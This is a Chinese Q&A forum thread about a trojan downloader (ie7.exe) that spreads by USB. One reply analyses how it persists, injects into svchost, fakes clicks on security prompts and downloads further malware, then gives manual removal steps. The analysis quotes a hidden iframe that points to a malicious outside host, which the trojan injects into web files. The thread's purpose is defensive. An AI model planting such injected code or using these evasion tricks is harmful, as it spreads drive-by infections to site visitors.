电脑突然中毒了,在每个分区都有一个IE7.EXE和一个自动运行文件,删除...

发布网友 发布时间：2024-10-22 20:05

我来回答

共2个回答

热心网友 时间：3分钟前

你好
这是一个通过U盘传播的木马下载器

File: ie7.exe
Size: 37376 bytes
MD5: FA931258C1FEFA770EB91A5EB6CA4D
SHA1: 72EC4D4A8E9D15C1DEAF6FCE6F2C8867C6A38F41
CRC32: 04DC6B68
编写语言：Delphi

病毒运行后
生成如下文件
C:\WINDOWS\system32\ie7.exe
同时注册为服务：ie7 ，达到开机启动的目的
服务描述：为即插即用设备提供支持
显示名称：Telepho
启动类型：自动

启动一个svchost.exe 将自身注入到svchost.exe的进程空间中（方便下载木马，因为svchost.exe一般就是需要联网的，通过他联网，防火墙不会有任何反映）

试图向瑞星的卡卡上网助手的IE防漏墙发送模拟按键“允许”的命令
试图向IE执行保护的窗口发送模拟按键“允许执行”的命令

ping 127.0.0.0 15次
修改系统时间为 1981年1月12日

在每个分区下生成一个autorun.inf和ie7.exe

下载木马:http://ads.xxxxxxx.com/100.exe~119.exe到%system32%下面

下载的木马种类和上回分析的pegefile.pif几乎一样
木马植入完毕后 生成如下一些文件（包括但不限于）
C:\Program Files\Internet Explorer\PLUGINS\SysWin.Jmp
C:\Program Files\Internet Explorer\PLUGINS\WinSys.Sys（盗号木马，并在E盘下生成Autorun.exe）
C:\Program Files\Internet Explorer\PLUGINS\WinSys.Tao
C:\WINDOWS\system32\drivers\usbinte.sys
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\ejcepm.dll
C:\WINDOWS\system32\ezdngw.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\kwuppx.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\winow.dll
C:\WINDOWS\winow.exe
C:\WINDOWS\system32\NVDispDrv.dll
C:\WINDOWS\system32\pfmlqz.dll
C:\WINDOWS\system32\skguud.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\visin.exe
C:\WINDOWS\system32\xzqsmg.dll
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\NVDispDrv.exe
C:\WINDOWS\RichDll.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\system32\nslkupi.exe（具备arp欺骗功能）
C:\WINDOWS\uninstall\rundl132.exe（威金，感染可执行文件）
C:\WINDOWS\system32\ntsokele.exe（感染htm asp html等文件，在其后面加入<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>的代码）
...
对应sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<cmdbcs><C:\WINDOWS\cmdbcs.exe> []
<NVDispDrv><C:\WINDOWS\NVDispDrv.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<load><C:\WINDOWS\uninstall\rundl132.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<MSDEG32><LYLoader.exe> []
<MSDWG32><LYLoadbr.exe> [N/A]
<MSDCG32 ><LYLeador.exe> [N/A]
<MSDOG32><LYLoador.exe> [N/A]
<MSDSG32><LYLoadar.exe> [N/A]
<MSDMG32><LYLoadmr.exe> [N/A]
<MSDHG32><LYLoadhr.exe> [N/A]
<MSDQG32><LYLoadqr.exe> [N/A]
<visin><C:\WINDOWS\system32\visin.exe> [Microsoft Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{5D83AD9C-3BFC-43F5-979D-2904DBC54A8E}><C:\Program Files\Internet Explorer\PLUGINS\WinSys.Sys> []
服务：
[Telepho / ie7][Stopped/Auto Start]
<C:\WINDOWS\system32\ie7.exe><N/A>
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
<C:\WINDOWS\system32\ntsokele.exe><N/A>

清除办法：
重启计算机进入
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng （http://download.kztechs.com/files/sreng2.zip）
启动项目 注册表 删除如下项目
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<cmdbcs><C:\WINDOWS\cmdbcs.exe> []
<NVDispDrv><C:\WINDOWS\NVDispDrv.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<load><C:\WINDOWS\uninstall\rundl132.exe> []
<MSDEG32><LYLoader.exe> []
<MSDWG32><LYLoadbr.exe> [N/A]
<MSDCG32 ><LYLeador.exe> [N/A]
<MSDOG32><LYLoador.exe> [N/A]
<MSDSG32><LYLoadar.exe> [N/A]
<MSDMG32><LYLoadmr.exe> [N/A]
<MSDHG32><LYLoadhr.exe> [N/A]
<MSDQG32><LYLoadqr.exe> [N/A]
<visin><C:\WINDOWS\system32\visin.exe> [Microsoft Corporation]

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：
Telepho / ie7
Remote Help Session Manager / Rasautol

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮（搜索右边的按钮）
从左边的资源管理器 进入C盘
删除如下文件C:\Program Files\Internet Explorer\PLUGINS\SysWin.Jmp
C:\Program Files\Internet Explorer\PLUGINS\WinSys.Sys
C:\Program Files\Internet Explorer\PLUGINS\WinSys.Tao
C:\WINDOWS\system32\drivers\usbinte.sys
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\ejcepm.dll
C:\WINDOWS\system32\ezdngw.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\kwuppx.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\winow.dll
C:\WINDOWS\winow.exe
C:\WINDOWS\system32\NVDispDrv.dll
C:\WINDOWS\system32\pfmlqz.dll
C:\WINDOWS\system32\skguud.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\visin.exe
C:\WINDOWS\system32\xzqsmg.dll
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\NVDispDrv.exe
C:\WINDOWS\RichDll.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\system32\nslkupi.exe
C:\WINDOWS\uninstall\rundl132.exe
C:\WINDOWS\system32\ntsokele.exe
C:\ie7.exe
C:\autorun.inf
从左边的资源管理器 进入其他盘
删除ie7.exe autorun.inf 删除E盘下的autorun.exe
如果装有QQ请把QQ 安装文件夹中的Timplatform.exe删除 把Timplatfrom.exe重命名为Timplatform.exe
over~

热心网友 时间：6分钟前

去安全模式下，手动删，或者用病毒杀

注意用右键打开，不要双击